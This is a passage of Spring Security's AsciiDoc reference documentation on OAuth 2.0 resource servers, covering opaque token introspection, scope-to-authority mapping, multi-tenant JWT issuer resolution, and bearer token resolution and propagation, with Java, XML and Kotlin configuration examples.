corresponding expressions should include this prefix:\n\n.Authorization Opaque Token Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class MappedAuthorities extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests -> authorizeRequests\n .mvcMatchers(\"\/contacts\/**\").hasAuthority(\"SCOPE_contacts\")\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_messages\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(OAuth2ResourceServerConfigurer::opaqueToken);\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-url pattern=\"\/contacts\/**\" access=\"hasAuthority('SCOPE_contacts')\"\/>\n <intercept-url pattern=\"\/messages\/**\" access=\"hasAuthority('SCOPE_messages')\"\/>\n <oauth2-resource-server>\n <opaque-token introspector-ref=\"opaqueTokenIntrospector\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nOr similarly with method security:\n\n```java\n@PreAuthorize(\"hasAuthority('SCOPE_messages')\")\npublic List<Message> getMessages(...) {}\n```\n\n[[oauth2resourceserver-opaque-authorization-extraction]]\n==== Extracting Authorities Manually\n\nBy default, Opaque Token support will extract the `scope` claim from an introspection response and parse it into individual `GrantedAuthority` instances.\n\nFor example, if the introspection response were:\n\n[source,json]\n----\n{\n \"active\" : true,\n \"scope\" : \"message:read message:write\"\n}\n----\n\nThen Resource Server would generate an `Authentication` with two authorities, one for `message:read` and the other for `message:write`.\n\nThis can, of course, be customized using a custom `OpaqueTokenIntrospector` that takes a look at the attribute set and converts it in its own way:\n\n[source,java]\n----\npublic class CustomAuthoritiesOpaqueTokenIntrospector implements OpaqueTokenIntrospector {\n private OpaqueTokenIntrospector delegate =\n new NimbusOpaqueTokenIntrospector(\"https:\/\/idp.example.org\/introspect\", \"client\", \"secret\");\n\n public OAuth2AuthenticatedPrincipal introspect(String token) {\n OAuth2AuthenticatedPrincipal principal = this.delegate.introspect(token);\n return new DefaultOAuth2AuthenticatedPrincipal(\n principal.getName(), principal.getAttributes(), extractAuthorities(principal));\n }\n\n private Collection<GrantedAuthority> extractAuthorities(OAuth2AuthenticatedPrincipal principal) {\n List<String> scopes = principal.getAttribute(OAuth2IntrospectionClaimNames.SCOPE);\n return scopes.stream()\n .map(SimpleGrantedAuthority::new)\n .collect(Collectors.toList());\n }\n}\n----\n\nThereafter, this custom introspector can be configured simply by exposing it as a `@Bean`:\n\n[source,java]\n----\n@Bean\npublic OpaqueTokenIntrospector introspector() {\n return new CustomAuthoritiesOpaqueTokenIntrospector();\n}\n----\n\n[[oauth2resourceserver-opaque-timeouts]]\n=== Configuring Timeouts\n\nBy default, Resource Server uses connection and socket timeouts of 30 seconds each for coordinating with the authorization server.\n\nThis may be too short in some scenarios.\nFurther, it doesn't take into account more sophisticated patterns like back-off and discovery.\n\nTo adjust the way in which Resource Server connects to the authorization server, `NimbusOpaqueTokenIntrospector` accepts an instance of `RestOperations`:\n\n```java\n@Bean\npublic OpaqueTokenIntrospector introspector(RestTemplateBuilder builder) {\n RestOperations rest = builder\n 
.basicAuthentication(clientId, clientSecret)\n .setConnectTimeout(Duration.ofSeconds(60))\n .setReadTimeout(Duration.ofSeconds(60))\n .build();\n\n return new NimbusOpaqueTokenIntrospector(introspectionUri, rest);\n}\n```\n\n[[oauth2resourceserver-opaque-jwt-introspector]]\n=== Using Introspection with JWTs\n\nA common question is whether or not introspection is compatible with JWTs.\nSpring Security's Opaque Token support has been designed to not care about the format of the token -- it will gladly pass any token to the introspection endpoint provided.\n\nSo, let's say you're required to check with the authorization server on each request, in case the JWT has been revoked.\n\nEven though you are using the JWT format for the token, your validation method is introspection, meaning you'd want to do:\n\n[source,yaml]\n----\nspring:\n security:\n oauth2:\n resourceserver:\n opaque-token:\n introspection-uri: https:\/\/idp.example.org\/introspection\n client-id: client\n client-secret: secret\n----\n\nIn this case, the resulting `Authentication` would be `BearerTokenAuthentication`.\nAny attributes in the corresponding `OAuth2AuthenticatedPrincipal` would be whatever was returned by the introspection endpoint.\n\nBut, let's say that, oddly enough, the introspection endpoint only returns whether or not the token is active.\nNow what?\n\nIn this case, you can create a custom `OpaqueTokenIntrospector` that still hits the endpoint, but then updates the returned principal to have the JWT's claims as the attributes:\n\n[source,java]\n----\npublic class JwtOpaqueTokenIntrospector implements OpaqueTokenIntrospector {\n private OpaqueTokenIntrospector delegate =\n new NimbusOpaqueTokenIntrospector(\"https:\/\/idp.example.org\/introspect\", \"client\", \"secret\");\n private JwtDecoder jwtDecoder = new NimbusJwtDecoder(new ParseOnlyJWTProcessor());\n\n public OAuth2AuthenticatedPrincipal introspect(String token) {\n OAuth2AuthenticatedPrincipal principal = this.delegate.introspect(token);\n try {\n Jwt jwt = this.jwtDecoder.decode(token);\n return new DefaultOAuth2AuthenticatedPrincipal(jwt.getClaims(), NO_AUTHORITIES);\n } catch (JwtException e) {\n throw new OAuth2IntrospectionException(e.getMessage(), e);\n }\n }\n\n private static class ParseOnlyJWTProcessor extends DefaultJWTProcessor<SecurityContext> {\n public JWTClaimsSet process(SignedJWT jwt, SecurityContext context) throws JOSEException {\n return jwt.getJWTClaimsSet();\n }\n }\n}\n----\n\nThereafter, this custom introspector can be configured simply by exposing it as a `@Bean`:\n\n[source,java]\n----\n@Bean\npublic OpaqueTokenIntrospector introspector() {\n return new JwtOpaqueTokenIntrospector();\n}\n----\n\n[[oauth2resourceserver-opaque-userinfo]]\n=== Calling a `\/userinfo` Endpoint\n\nGenerally speaking, a Resource Server doesn't care about the underlying user, but instead about the authorities that have been granted.\n\nThat said, at times it can be valuable to tie the authorization statement back to a user.\n\nIf an application is also using `spring-security-oauth2-client`, having set up the appropriate `ClientRegistrationRepository`, then this is quite simple with a custom `OpaqueTokenIntrospector`.\nThe implementation below does three things:\n\n* Delegates to the introspection endpoint, to affirm the token's validity\n* Looks up the appropriate client registration associated with the `\/userinfo` endpoint\n* Invokes and returns the response from the `\/userinfo` endpoint\n\n[source,java]\n----\npublic class UserInfoOpaqueTokenIntrospector implements 
OpaqueTokenIntrospector {\n private final OpaqueTokenIntrospector delegate =\n new NimbusOpaqueTokenIntrospector(\"https:\/\/idp.example.org\/introspect\", \"client\", \"secret\");\n private final OAuth2UserService<OAuth2UserRequest, OAuth2User> oauth2UserService = new DefaultOAuth2UserService();\n\n private final ClientRegistrationRepository repository;\n\n \/\/ ... constructor\n\n @Override\n public OAuth2AuthenticatedPrincipal introspect(String token) {\n OAuth2AuthenticatedPrincipal authorized = this.delegate.introspect(token);\n Instant issuedAt = authorized.getAttribute(ISSUED_AT);\n Instant expiresAt = authorized.getAttribute(EXPIRES_AT);\n ClientRegistration clientRegistration = this.repository.findByRegistrationId(\"registration-id\");\n OAuth2AccessToken accessToken = new OAuth2AccessToken(BEARER, token, issuedAt, expiresAt);\n OAuth2UserRequest oauth2UserRequest = new OAuth2UserRequest(clientRegistration, accessToken);\n return this.oauth2UserService.loadUser(oauth2UserRequest);\n }\n}\n----\n\nIf you aren't using `spring-security-oauth2-client`, it's still quite simple.\nYou will simply need to invoke the `\/userinfo` endpoint with your own instance of `WebClient`:\n\n[source,java]\n----\npublic class UserInfoOpaqueTokenIntrospector implements OpaqueTokenIntrospector {\n private final OpaqueTokenIntrospector delegate =\n new NimbusOpaqueTokenIntrospector(\"https:\/\/idp.example.org\/introspect\", \"client\", \"secret\");\n private final WebClient rest = WebClient.create();\n\n @Override\n public OAuth2AuthenticatedPrincipal introspect(String token) {\n OAuth2AuthenticatedPrincipal authorized = this.delegate.introspect(token);\n return makeUserInfoRequest(authorized);\n }\n}\n----\n\nEither way, having created your `OpaqueTokenIntrospector`, you should publish it as a `@Bean` to override the defaults:\n\n[source,java]\n----\n@Bean\nOpaqueTokenIntrospector introspector() {\n return new UserInfoOpaqueTokenIntrospector(...);\n}\n----\n\n[[oauth2reourceserver-opaqueandjwt]]\n=== Supporting both JWT and Opaque Token\n\nIn some cases, you may have a need to access both kinds of tokens.\nFor example, you may support more than one tenant where one tenant issues JWTs and the other issues opaque tokens.\n\nIf this decision must be made at request-time, then you can use an `AuthenticationManagerResolver` to achieve it, like so:\n\n[source,java]\n----\n@Bean\nAuthenticationManagerResolver<HttpServletRequest> tokenAuthenticationManagerResolver() {\n JwtAuthenticationProvider jwt = jwt();\n OpaqueTokenAuthenticationProvider opaqueToken = opaqueToken();\n\n return request -> {\n if (useJwt(request)) {\n return jwt::authenticate;\n } else {\n return opaqueToken::authenticate;\n }\n };\n}\n----\n\nNOTE: The implementation of `useJwt(HttpServletRequest)` will likely depend on custom request material like the path.\n\n
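As a rough sketch only, such a check might key off of the request path; the `\/legacy` prefix here is purely an assumption for illustration, not anything Spring Security prescribes:\n\n[source,java]\n----\n\/\/ hypothetical: suppose only the legacy endpoints still receive opaque tokens\nprivate boolean useJwt(HttpServletRequest request) {\n return !request.getRequestURI().startsWith(\"\/legacy\");\n}\n----\n\n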
And then specify this `AuthenticationManagerResolver` in the DSL:\n\n.Authentication Manager Resolver\n====\n.Java\n[source,java,role=\"primary\"]\n----\nhttp\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .authenticationManagerResolver(this.tokenAuthenticationManagerResolver)\n );\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <oauth2-resource-server authentication-manager-resolver-ref=\"tokenAuthenticationManagerResolver\"\/>\n<\/http>\n----\n====\n\n[[oauth2resourceserver-multitenancy]]\n=== Multi-tenancy\n\nA resource server is considered multi-tenant when there are multiple strategies for verifying a bearer token, keyed by some tenant identifier.\n\nFor example, your resource server may accept bearer tokens from two different authorization servers.\nOr, your authorization server may represent a multiplicity of issuers.\n\nIn each case, there are two things that need to be done and trade-offs associated with how you choose to do them:\n\n1. Resolve the tenant\n2. Propagate the tenant\n\n==== Resolving the Tenant By Claim\n\nOne way to differentiate tenants is by the issuer claim.\nSince the issuer claim accompanies signed JWTs, this can be done with the `JwtIssuerAuthenticationManagerResolver`, like so:\n\n.Multitenancy Tenant by JWT Claim\n====\n.Java\n[source,java,role=\"primary\"]\n----\nJwtIssuerAuthenticationManagerResolver authenticationManagerResolver = new JwtIssuerAuthenticationManagerResolver\n (\"https:\/\/idp.example.org\/issuerOne\", \"https:\/\/idp.example.org\/issuerTwo\");\n\nhttp\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .authenticationManagerResolver(authenticationManagerResolver)\n );\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <oauth2-resource-server authentication-manager-resolver-ref=\"authenticationManagerResolver\"\/>\n<\/http>\n\n<bean id=\"authenticationManagerResolver\"\n class=\"org.springframework.security.oauth2.server.resource.authentication.JwtIssuerAuthenticationManagerResolver\">\n <constructor-arg>\n <list>\n <value>https:\/\/idp.example.org\/issuerOne<\/value>\n <value>https:\/\/idp.example.org\/issuerTwo<\/value>\n <\/list>\n <\/constructor-arg>\n<\/bean>\n----\n====\n\nThis is nice because the issuer endpoints are loaded lazily.\nIn fact, the corresponding `JwtAuthenticationProvider` is instantiated only when the first request with the corresponding issuer is sent.\nThis allows the application to start up independently of those authorization servers being up and available.\n\n===== Dynamic Tenants\n\nOf course, you may not want to restart the application each time a new tenant is added.\nIn this case, you can configure the `JwtIssuerAuthenticationManagerResolver` with a repository of `AuthenticationManager` instances, which you can edit at runtime, like so:\n\n[source,java]\n----\nprivate void addManager(Map<String, AuthenticationManager> authenticationManagers, String issuer) {\n JwtAuthenticationProvider authenticationProvider = new JwtAuthenticationProvider\n (JwtDecoders.fromIssuerLocation(issuer));\n authenticationManagers.put(issuer, authenticationProvider::authenticate);\n}\n\n\/\/ ...\n\nJwtIssuerAuthenticationManagerResolver authenticationManagerResolver =\n new JwtIssuerAuthenticationManagerResolver(authenticationManagers::get);\n\nhttp\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .authenticationManagerResolver(authenticationManagerResolver)\n );\n----\n\nIn this case, you construct `JwtIssuerAuthenticationManagerResolver` with a strategy for obtaining the `AuthenticationManager` given the issuer.\nThis approach allows us to add and remove elements from the repository (shown as a `Map` in the snippet) at runtime.\n\nNOTE: It would be unsafe to simply take any issuer and construct an `AuthenticationManager` from it.\nThe issuer should be one that the code can verify from a trusted source like a whitelist.\n\n
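A minimal sketch of such a guard, assuming a hypothetical `trustedIssuers` allowlist loaded from configuration you control:\n\n[source,java]\n----\n\/\/ assumption: trustedIssuers is populated from trusted configuration, never from the request\nprivate void registerTenant(String issuer) {\n if (!this.trustedIssuers.contains(issuer)) {\n throw new IllegalArgumentException(\"refusing to trust issuer: \" + issuer);\n }\n addManager(this.authenticationManagers, issuer);\n}\n----\n\n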
===== Parsing the Claim Only Once\n\nYou may have observed that this strategy, while simple, comes with the trade-off that the JWT is parsed once by the `AuthenticationManagerResolver` and then again by the `JwtDecoder` later on in the request.\n\nThis extra parsing can be alleviated by configuring the `JwtDecoder` directly with a `JWTClaimsSetAwareJWSKeySelector` from Nimbus:\n\n[source,java]\n----\n@Component\npublic class TenantJWSKeySelector\n implements JWTClaimsSetAwareJWSKeySelector<SecurityContext> {\n\n private final TenantRepository tenants; <1>\n private final Map<String, JWSKeySelector<SecurityContext>> selectors = new ConcurrentHashMap<>(); <2>\n\n public TenantJWSKeySelector(TenantRepository tenants) {\n this.tenants = tenants;\n }\n\n @Override\n public List<? extends Key> selectKeys(JWSHeader jwsHeader, JWTClaimsSet jwtClaimsSet, SecurityContext securityContext)\n throws KeySourceException {\n return this.selectors.computeIfAbsent(toTenant(jwtClaimsSet), this::fromTenant)\n .selectJWSKeys(jwsHeader, securityContext);\n }\n\n private String toTenant(JWTClaimsSet claimSet) {\n return (String) claimSet.getClaim(\"iss\");\n }\n\n private JWSKeySelector<SecurityContext> fromTenant(String tenant) {\n return Optional.ofNullable(this.tenants.findById(tenant)) <3>\n .map(t -> t.getAttribute(\"jwks_uri\"))\n .map(this::fromUri)\n .orElseThrow(() -> new IllegalArgumentException(\"unknown tenant\"));\n }\n\n private JWSKeySelector<SecurityContext> fromUri(String uri) {\n try {\n return JWSAlgorithmFamilyJWSKeySelector.fromJWKSetURL(new URL(uri)); <4>\n } catch (Exception e) {\n throw new IllegalArgumentException(e);\n }\n }\n}\n----\n<1> A hypothetical source for tenant information\n<2> A cache for `JWSKeySelector`s, keyed by tenant identifier\n<3> Looking up the tenant is more secure than simply calculating the JWK Set endpoint on the fly - the lookup acts as a tenant whitelist\n<4> Create a `JWSKeySelector` via the types of keys that come back from the JWK Set endpoint - the lazy lookup here means that you don't need to configure all tenants at startup\n\nThe above key selector is a composition of many key selectors.\nIt chooses which key selector to use based on the `iss` claim in the JWT.\n\nNOTE: To use this approach, make sure that the authorization server is configured to include the claim set as part of the token's signature.\nWithout this, you have no guarantee that the issuer hasn't been altered by a bad actor.\n\nNext, we can construct a `JWTProcessor`:\n\n[source,java]\n----\n@Bean\nJWTProcessor<SecurityContext> jwtProcessor(JWTClaimsSetAwareJWSKeySelector<SecurityContext> keySelector) {\n ConfigurableJWTProcessor<SecurityContext> jwtProcessor =\n new DefaultJWTProcessor<>();\n jwtProcessor.setJWTClaimsSetAwareJWSKeySelector(keySelector);\n return jwtProcessor;\n}\n----\n\nAs you can see, the trade-off for moving tenant-awareness down to this level is more configuration.\nThere is just a bit more to go.\n\nNext, we still want to make sure the issuer is validated.\nBut, since the issuer may differ per JWT, you'll need a tenant-aware validator, too:\n\n[source,java]\n----\n@Component\npublic class TenantJwtIssuerValidator implements OAuth2TokenValidator<Jwt> {\n private final TenantRepository tenants;\n private final Map<String, JwtIssuerValidator> validators = new ConcurrentHashMap<>();\n\n public TenantJwtIssuerValidator(TenantRepository tenants) {\n this.tenants = tenants;\n }\n\n @Override\n public OAuth2TokenValidatorResult validate(Jwt token) {\n return this.validators.computeIfAbsent(toTenant(token), 
this::fromTenant)\n .validate(token);\n }\n\n private String toTenant(Jwt jwt) {\n return jwt.getIssuer().toString();\n }\n\n private JwtIssuerValidator fromTenant(String tenant) {\n return Optional.ofNullable(this.tenants.findById(tenant))\n .map(t -> t.getAttribute(\"issuer\"))\n .map(JwtIssuerValidator::new)\n .orElseThrow(() -> new IllegalArgumentException(\"unknown tenant\"));\n }\n}\n----\n\nNow that we have a tenant-aware processor and a tenant-aware validator, we can proceed with creating our `JwtDecoder`:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder(JWTProcessor<SecurityContext> jwtProcessor, OAuth2TokenValidator<Jwt> jwtValidator) {\n NimbusJwtDecoder decoder = new NimbusJwtDecoder(jwtProcessor);\n OAuth2TokenValidator<Jwt> validator = new DelegatingOAuth2TokenValidator<>\n (JwtValidators.createDefault(), jwtValidator);\n decoder.setJwtValidator(validator);\n return decoder;\n}\n----\n\nWe've finished talking about resolving the tenant.\n\nIf you've chosen to resolve the tenant by something other than a JWT claim, then you'll need to make sure you address your downstream resource servers in the same way.\nFor example, if you are resolving it by subdomain, you may need to address the downstream resource server using the same subdomain.\n\nHowever, if you resolve it by a claim in the bearer token, read on to learn about <<oauth2resourceserver-bearertoken-resolver,Spring Security's support for bearer token propagation>>.\n\n[[oauth2resourceserver-bearertoken-resolver]]\n=== Bearer Token Resolution\n\nBy default, Resource Server looks for a bearer token in the `Authorization` header.\nThis, however, can be customized in a couple of ways.\n\n==== Reading the Bearer Token from a Custom Header\n\nFor example, you may need to read the bearer token from a custom header.\nTo achieve this, you can wire a `HeaderBearerTokenResolver` instance into the DSL, as you can see in the following example:\n\n.Custom Bearer Token Header\n====\n.Java\n[source,java,role=\"primary\"]\n----\nhttp\n .oauth2ResourceServer(oauth2 -> oauth2\n .bearerTokenResolver(new HeaderBearerTokenResolver(\"x-goog-iap-jwt-assertion\"))\n );\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <oauth2-resource-server bearer-token-resolver-ref=\"bearerTokenResolver\"\/>\n<\/http>\n\n<bean id=\"bearerTokenResolver\"\n class=\"org.springframework.security.oauth2.server.resource.web.HeaderBearerTokenResolver\">\n <constructor-arg value=\"x-goog-iap-jwt-assertion\"\/>\n<\/bean>\n----\n====\n\n==== Reading the Bearer Token from a Form Parameter\n\nOr, you may wish to read the token from a form parameter, which you can do by configuring the `DefaultBearerTokenResolver`, as you can see below:\n\n.Form Parameter Bearer Token\n====\n.Java\n[source,java,role=\"primary\"]\n----\nDefaultBearerTokenResolver resolver = new DefaultBearerTokenResolver();\nresolver.setAllowFormEncodedBodyParameter(true);\nhttp\n .oauth2ResourceServer(oauth2 -> oauth2\n .bearerTokenResolver(resolver)\n );\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <oauth2-resource-server bearer-token-resolver-ref=\"bearerTokenResolver\"\/>\n<\/http>\n\n<bean id=\"bearerTokenResolver\"\n class=\"org.springframework.security.oauth2.server.resource.web.DefaultBearerTokenResolver\">\n <property name=\"allowFormEncodedBodyParameter\" value=\"true\"\/>\n<\/bean>\n----\n====\n\n=== Bearer Token Propagation\n\nNow that your resource server has validated the token, it might be handy to pass it to downstream 
services.\nThis is quite simple with `{security-api-url}org\/springframework\/security\/oauth2\/server\/resource\/web\/reactive\/function\/client\/ServletBearerExchangeFilterFunction.html[ServletBearerExchangeFilterFunction]`, which you can see in the following example:\n\n[source,java]\n----\n@Bean\npublic WebClient rest() {\n return WebClient.builder()\n .filter(new ServletBearerExchangeFilterFunction())\n .build();\n}\n----\n\nWhen the above `WebClient` is used to perform requests, Spring Security will look up the current `Authentication` and extract any `{security-api-url}org\/springframework\/security\/oauth2\/core\/AbstractOAuth2Token.html[AbstractOAuth2Token]` credential.\nThen, it will propagate that token in the `Authorization` header.\n\nFor example:\n\n[source,java]\n----\nthis.rest.get()\n .uri(\"https:\/\/other-service.example.com\/endpoint\")\n .retrieve()\n .bodyToMono(String.class)\n .block();\n----\n\nThis will invoke `https:\/\/other-service.example.com\/endpoint`, adding the bearer token `Authorization` header for you.\n\nIn places where you need to override this behavior, it's a simple matter of supplying the header yourself, like so:\n\n[source,java]\n----\nthis.rest.get()\n .uri(\"https:\/\/other-service.example.com\/endpoint\")\n .headers(headers -> headers.setBearerAuth(overridingToken))\n .retrieve()\n .bodyToMono(String.class)\n .block();\n----\n\nIn this case, the filter will fall back and simply forward the request onto the rest of the web filter chain.\n\n[NOTE]\nUnlike the {security-api-url}org\/springframework\/security\/oauth2\/client\/web\/reactive\/function\/client\/ServletOAuth2AuthorizedClientExchangeFilterFunction.html[OAuth 2.0 Client filter function], this filter function makes no attempt to renew the token, should it be expired.\nTo obtain this level of support, please use the OAuth 2.0 Client filter.\n\n==== `RestTemplate` support\n\nThere is no `RestTemplate` equivalent for `ServletBearerExchangeFilterFunction` at the moment, but you can propagate the request's bearer token quite simply with your own interceptor:\n\n[source,java]\n----\n@Bean\nRestTemplate rest() {\n RestTemplate rest = new RestTemplate();\n rest.getInterceptors().add((request, body, execution) -> {\n Authentication authentication = SecurityContextHolder.getContext().getAuthentication();\n if (authentication == null) {\n return execution.execute(request, body);\n }\n\n if (!(authentication.getCredentials() instanceof AbstractOAuth2Token)) {\n return execution.execute(request, body);\n }\n\n AbstractOAuth2Token token = (AbstractOAuth2Token) authentication.getCredentials();\n request.getHeaders().setBearerAuth(token.getTokenValue());\n return execution.execute(request, body);\n });\n return rest;\n}\n----\n\n[NOTE]\nUnlike the {security-api-url}org\/springframework\/security\/oauth2\/client\/OAuth2AuthorizedClientManager.html[OAuth 2.0 Authorized Client Manager], this interceptor makes no attempt to renew the token, should it be expired.\nTo obtain this level of support, please create an interceptor using the <<oauth2client,OAuth 2.0 Authorized Client Manager>>.\n\n
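Usage then mirrors the earlier `WebClient` example.\nAssuming the bean above has been injected as `this.rest`, a call might look like the following sketch:\n\n[source,java]\n----\n\/\/ the interceptor adds the current request's bearer token before this call goes out\nString response = this.rest.getForObject(\"https:\/\/other-service.example.com\/endpoint\", String.class);\n----\n\n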
[[oauth2resourceserver-bearertoken-failure]]\n=== Bearer Token Failure\n\nA bearer token may be invalid for a number of reasons.\nFor example, the token may no longer be active.\n\nIn these circumstances, Resource Server throws an `InvalidBearerTokenException`.\nLike other exceptions, this results in an OAuth 2.0 Bearer Token error response:\n\n[source,http]\n----\nHTTP\/1.1 401 Unauthorized\nWWW-Authenticate: Bearer error=\"invalid_token\", error_description=\"Unsupported algorithm of none\", error_uri=\"https:\/\/tools.ietf.org\/html\/rfc6750#section-3.1\"\n----\n\nAdditionally, it is published as an `AuthenticationFailureBadCredentialsEvent`, which you can <<servlet-events,listen for in your application>> like so:\n\n[source,java]\n----\n@Component\npublic class FailureEvents {\n @EventListener\n public void onFailure(AuthenticationFailureBadCredentialsEvent badCredentials) {\n if (badCredentials.getAuthentication() instanceof BearerTokenAuthenticationToken) {\n \/\/ ... handle\n }\n }\n}\n----\n","old_contents":"
Expectations\n\nWhen this property and these dependencies are used, Resource Server will automatically configure itself to validate JWT-encoded Bearer Tokens.\n\nIt achieves this through a deterministic startup process:\n\n1. Hit the Provider Configuration or Authorization Server Metadata endpoint, processing the response for the `jwks_url` property\n2. Configure the validation strategy to query `jwks_url` for valid public keys\n3. Configure the validation strategy to validate each JWTs `iss` claim against `https:\/\/idp.example.com`.\n\nA consequence of this process is that the authorization server must be up and receiving requests in order for Resource Server to successfully start up.\n\n[NOTE]\nIf the authorization server is down when Resource Server queries it (given appropriate timeouts), then startup will fail.\n\n==== Runtime Expectations\n\nOnce the application is started up, Resource Server will attempt to process any request containing an `Authorization: Bearer` header:\n\n[source,html]\n----\nGET \/ HTTP\/1.1\nAuthorization: Bearer some-token-value # Resource Server will process this\n----\n\nSo long as this scheme is indicated, Resource Server will attempt to process the request according to the Bearer Token specification.\n\nGiven a well-formed JWT, Resource Server will:\n\n1. Validate its signature against a public key obtained from the `jwks_url` endpoint during startup and matched against the JWT\n2. Validate the JWT's `exp` and `nbf` timestamps and the JWT's `iss` claim, and\n3. Map each scope to an authority with the prefix `SCOPE_`.\n\n[NOTE]\nAs the authorization server makes available new keys, Spring Security will automatically rotate the keys used to validate JWTs.\n\nThe resulting `Authentication#getPrincipal`, by default, is a Spring Security `Jwt` object, and `Authentication#getName` maps to the JWT's `sub` property, if one is present.\n\nFrom here, consider jumping to:\n\n<<oauth2resourceserver-jwt-jwkseturi,How to Configure without Tying Resource Server startup to an authorization server's availability>>\n\n<<oauth2resourceserver-jwt-sansboot,How to Configure without Spring Boot>>\n\n[[oauth2resourceserver-jwt-jwkseturi]]\n=== Specifying the Authorization Server JWK Set Uri Directly\n\nIf the authorization server doesn't support any configuration endpoints, or if Resource Server must be able to start up independently from the authorization server, then the `jwk-set-uri` can be supplied as well:\n\n[source,yaml]\n----\nspring:\n security:\n oauth2:\n resourceserver:\n jwt:\n issuer-uri: https:\/\/idp.example.com\n jwk-set-uri: https:\/\/idp.example.com\/.well-known\/jwks.json\n----\n\n[NOTE]\nThe JWK Set uri is not standardized, but can typically be found in the authorization server's documentation\n\nConsequently, Resource Server will not ping the authorization server at startup.\nWe still specify the `issuer-uri` so that Resource Server still validates the `iss` claim on incoming JWTs.\n\n[NOTE]\nThis property can also be supplied directly on the <<oauth2resourceserver-jwt-jwkseturi-dsl,DSL>>.\n\n[[oauth2resourceserver-jwt-sansboot]]\n=== Overriding or Replacing Boot Auto Configuration\n\nThere are two `@Bean` s that Spring Boot generates on Resource Server's behalf.\n\nThe first is a `WebSecurityConfigurerAdapter` that configures the app as a resource server. 
When including `spring-security-oauth2-jose`, this `WebSecurityConfigurerAdapter` looks like:\n\n.Default JWT Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\nprotected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(OAuth2ResourceServerConfigurer::jwt);\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nfun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n jwt { }\n }\n }\n}\n----\n====\n\nIf the application doesn't expose a `WebSecurityConfigurerAdapter` bean, then Spring Boot will expose the above default one.\n\nReplacing this is as simple as exposing the bean within the application:\n\n.Custom JWT Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class MyCustomSecurityConfiguration extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_message:read\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .jwt(jwt -> jwt\n .jwtAuthenticationConverter(myConverter())\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass MyCustomSecurityConfiguration : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(\"\/messages\/**\", hasAuthority(\"SCOPE_message:read\"))\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n jwt {\n jwtAuthenticationConverter = myConverter()\n }\n }\n }\n }\n}\n----\n====\n\nThe above requires the scope of `message:read` for any URL that starts with `\/messages\/`.\n\nMethods on the `oauth2ResourceServer` DSL will also override or replace auto configuration.\n\nFor example, the second `@Bean` Spring Boot creates is a `JwtDecoder`, which decodes `String` tokens into validated instances of `Jwt`:\n\n\n.JWT Decoder\n====\n[source,java]\n----\n@Bean\npublic JwtDecoder jwtDecoder() {\n return JwtDecoders.fromIssuerLocation(issuerUri);\n}\n----\n====\n\n[NOTE]\nCalling `{security-api-url}org\/springframework\/security\/oauth2\/jwt\/JwtDecoders.html#fromIssuerLocation-java.lang.String-[JwtDecoders#fromIssuerLocation]` is what invokes the Provider Configuration or Authorization Server Metadata endpoint in order to derive the JWK Set Uri.\n\nIf the application doesn't expose a `JwtDecoder` bean, then Spring Boot will expose the above default one.\n\nAnd its configuration can be overridden using `jwkSetUri()` or replaced using `decoder()`.\n\nOr, if you're not using Spring Boot at all, then both of these components - the filter chain and a `JwtDecoder` can be specified in XML.\n\nThe filter chain is specified like so:\n\n.Default JWT Configuration\n====\n.Xml\n[source,xml,role=\"primary\"]\n----\n<http>\n <intercept-uri pattern=\"\/**\" access=\"authenticated\"\/>\n <oauth2-resource-server>\n <jwt decoder-ref=\"jwtDecoder\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nAnd the `JwtDecoder` like so:\n\n.JWT Decoder\n====\n.Xml\n[source,xml,role=\"primary\"]\n----\n<bean id=\"jwtDecoder\"\n class=\"org.springframework.security.oauth2.jwt.JwtDecoders\"\n factory-method=\"fromIssuerLocation\">\n <constructor-arg 
